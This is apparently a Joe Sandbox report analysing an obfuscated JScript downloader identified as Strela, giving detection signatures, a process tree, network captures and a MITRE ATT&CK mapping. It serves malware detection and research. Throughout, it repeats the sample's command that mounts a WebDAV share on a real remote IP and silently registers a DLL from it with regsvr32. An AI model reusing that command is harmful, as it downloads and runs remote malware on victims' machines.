Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6042109671038401.js

Overview

General Information

Sample name:6042109671038401.js
Analysis ID:1560608
MD5:98fca8fcdd0ca4d9d83555adf84688db
SHA1:dc66af5b91a9096d51cfc8de1aaee9348f705bf0
SHA256:1066efeee0ce0091820dc442b31f9739b3147771893f2bddc07aa15d7d1fcfbe
Tags:jsuser-cocaman
Infos:

Detection

Strela Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Strela Downloader
Gathers information about network shares
JavaScript file contains Antivirus product strings
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 5288 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 600 cmdline: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7040 cmdline: net use \\94.159.113.79@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 5288JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_5288.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", ProcessId: 5288, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 94.159.113.79, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 7040, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5288, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll, ProcessId: 600, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js", ProcessId: 5288, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\94.159.113.79@8888\davwwwroot\, CommandLine: net use \\94.159.113.79@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 600, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\94.159.113.79@8888\davwwwroot\, ProcessId: 7040, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\94.159.113.79@8888\davwwwroot\, CommandLine: net use \\94.159.113.79@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 600, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\94.159.113.79@8888\davwwwroot\, ProcessId: 7040, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://94.159.113.79:8888/BAvira URL Cloud: Label: phishing
      Source: http://94.159.113.79:8888/fVirustotal: Detection: 13%Perma Link
      Source: 6042109671038401.jsVirustotal: Detection: 17%Perma Link

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 94.159.113.79:8888
      Source: Joe Sandbox ViewIP Address: 94.159.113.79 94.159.113.79
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.79
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.79
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.79
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.79
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.79
      Source: net.exe, 00000003.00000002.1709612667.000001883162C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/
      Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/B
      Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/Z
      Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/f
      Source: net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/pace
      Source: net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/wL
      Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.79:8888/z

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_5288.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5288, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 6042109671038401.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winJS@6/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 6042109671038401.jsVirustotal: Detection: 17%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.11", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 4304Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 00000003.00000002.1709612667.0000018831639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`]1
      Source: net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.0000018831639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: 6042109671038401.jsInitial file: drweb, eset, avg
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information22
      Scripting
      Valid AccountsWindows Management Instrumentation22
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory11
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      6042109671038401.js8%ReversingLabsScript-JS.Malware.StrelaStealer
      6042109671038401.js18%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://94.159.113.79:8888/B100%Avira URL Cloudphishing
      http://94.159.113.79:8888/Z0%Avira URL Cloudsafe
      http://94.159.113.79:8888/wL0%Avira URL Cloudsafe
      http://94.159.113.79:8888/f0%Avira URL Cloudsafe
      http://94.159.113.79:8888/f14%VirustotalBrowse
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://94.159.113.79:8888/pacenet.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://94.159.113.79:8888/Bnet.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        http://94.159.113.79:8888/net.exe, 00000003.00000002.1709612667.000001883162C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://94.159.113.79:8888/wLnet.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://94.159.113.79:8888/Znet.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://94.159.113.79:8888/znet.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://94.159.113.79:8888/fnet.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmpfalse
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            94.159.113.79
            unknownRussian Federation
            49531NETCOM-R-ASRUtrue
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1560608
            Start date and time:2024-11-22 01:56:41 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 2m 2s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Without Instrumentation
            Number of analysed new started processes analysed:4
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:6042109671038401.js
            Detection:MAL
            Classification:mal100.rans.troj.spyw.evad.winJS@6/0@0/1
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .js
            • Stop behavior analysis, all processes terminated
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            19:57:36API Interceptor1x Sleep call for process: net.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            94.159.113.7932132191001147030648.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            32132191001147030648.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            2kgSNLzsp3.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            2kgSNLzsp3.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            1485223624968714276.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            7858290454868466.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            1485223624968714276.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            7858290454868466.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            12341169452550421723.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79:8888/
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            NETCOM-R-ASRU32132191001147030648.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            32132191001147030648.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            2kgSNLzsp3.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            2kgSNLzsp3.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            1485223624968714276.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            7858290454868466.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            1485223624968714276.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            7858290454868466.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            12341169452550421723.jsGet hashmaliciousStrela DownloaderBrowse
            • 94.159.113.79
            No context
            No context
            No created / dropped files found
            File type:ASCII text, with very long lines (65536), with no line terminators
            Entropy (8bit):4.715839565968604
            TrID:
              File name:6042109671038401.js
              File size:644'050 bytes
              MD5:98fca8fcdd0ca4d9d83555adf84688db
              SHA1:dc66af5b91a9096d51cfc8de1aaee9348f705bf0
              SHA256:1066efeee0ce0091820dc442b31f9739b3147771893f2bddc07aa15d7d1fcfbe
              SHA512:7a33bfb08844d12a53116262b42aba230b77777e104b3d6658118bac5bd9a92f2ae8eb68fc81b5ec8c8d94e3b029fb8feed9a6e5178abc265c5268dba4cb7a17
              SSDEEP:6144:TqTB9aFiSpE5AMKybBIyWITuNw2qGSSSceDQNw2qGSSSc1wVlSQ6:eVkFr25AMKEBIyWInwCw66
              TLSH:4DD47EF79BCEBFE25B256148457CF1068C4B50722ADBA45F3E674A0A4205E9EE83C317
              File Content Preview:spppadzgrqdqnyhqieeiqpxzblvheyietpqcyvgoeeczhiilocfmuriyopvvmmchteyfctrqqtrwadepprithmgjhagotpocxhronqdtztchngoleemevlruwfwhogdjnsoxgrxogtugfigwrmizqqienvsuapaadtlmgfrowexkugysrjcrqsbxpoqgiroosvctxhvyupivpbcczdtmnxqqczpektsmzgkkvrdufhmbobultqfwoagewxlhwag
              Icon Hash:68d69b8bb6aa9a86
              TimestampSource PortDest PortSource IPDest IP
              Nov 22, 2024 01:57:35.916291952 CET497308888192.168.2.494.159.113.79
              Nov 22, 2024 01:57:36.036186934 CET88884973094.159.113.79192.168.2.4
              Nov 22, 2024 01:57:36.036256075 CET497308888192.168.2.494.159.113.79
              Nov 22, 2024 01:57:36.036982059 CET497308888192.168.2.494.159.113.79
              Nov 22, 2024 01:57:36.156754971 CET88884973094.159.113.79192.168.2.4
              Nov 22, 2024 01:57:37.458456039 CET88884973094.159.113.79192.168.2.4
              Nov 22, 2024 01:57:37.503369093 CET497308888192.168.2.494.159.113.79
              Nov 22, 2024 01:57:37.619839907 CET497308888192.168.2.494.159.113.79
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.44973094.159.113.7988887040C:\Windows\System32\net.exe
              TimestampBytes transferredDirectionData
              Nov 22, 2024 01:57:36.036982059 CET107OUTOPTIONS / HTTP/1.1
              Connection: Keep-Alive
              User-Agent: DavClnt
              translate: f
              Host: 94.159.113.79:8888
              Nov 22, 2024 01:57:37.458456039 CET191INHTTP/1.1 500 Internal Server Error
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Fri, 22 Nov 2024 00:57:37 GMT
              Content-Length: 22
              Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
              Data Ascii: Internal server error


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:19:57:34
              Start date:21/11/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js"
              Imagebase:0x7ff798330000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:1
              Start time:19:57:34
              Start date:21/11/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll
              Imagebase:0x7ff62eca0000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:19:57:34
              Start date:21/11/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:19:57:34
              Start date:21/11/2024
              Path:C:\Windows\System32\net.exe
              Wow64 process (32bit):false
              Commandline:net use \\94.159.113.79@8888\davwwwroot\
              Imagebase:0x7ff62ffb0000
              File size:59'904 bytes
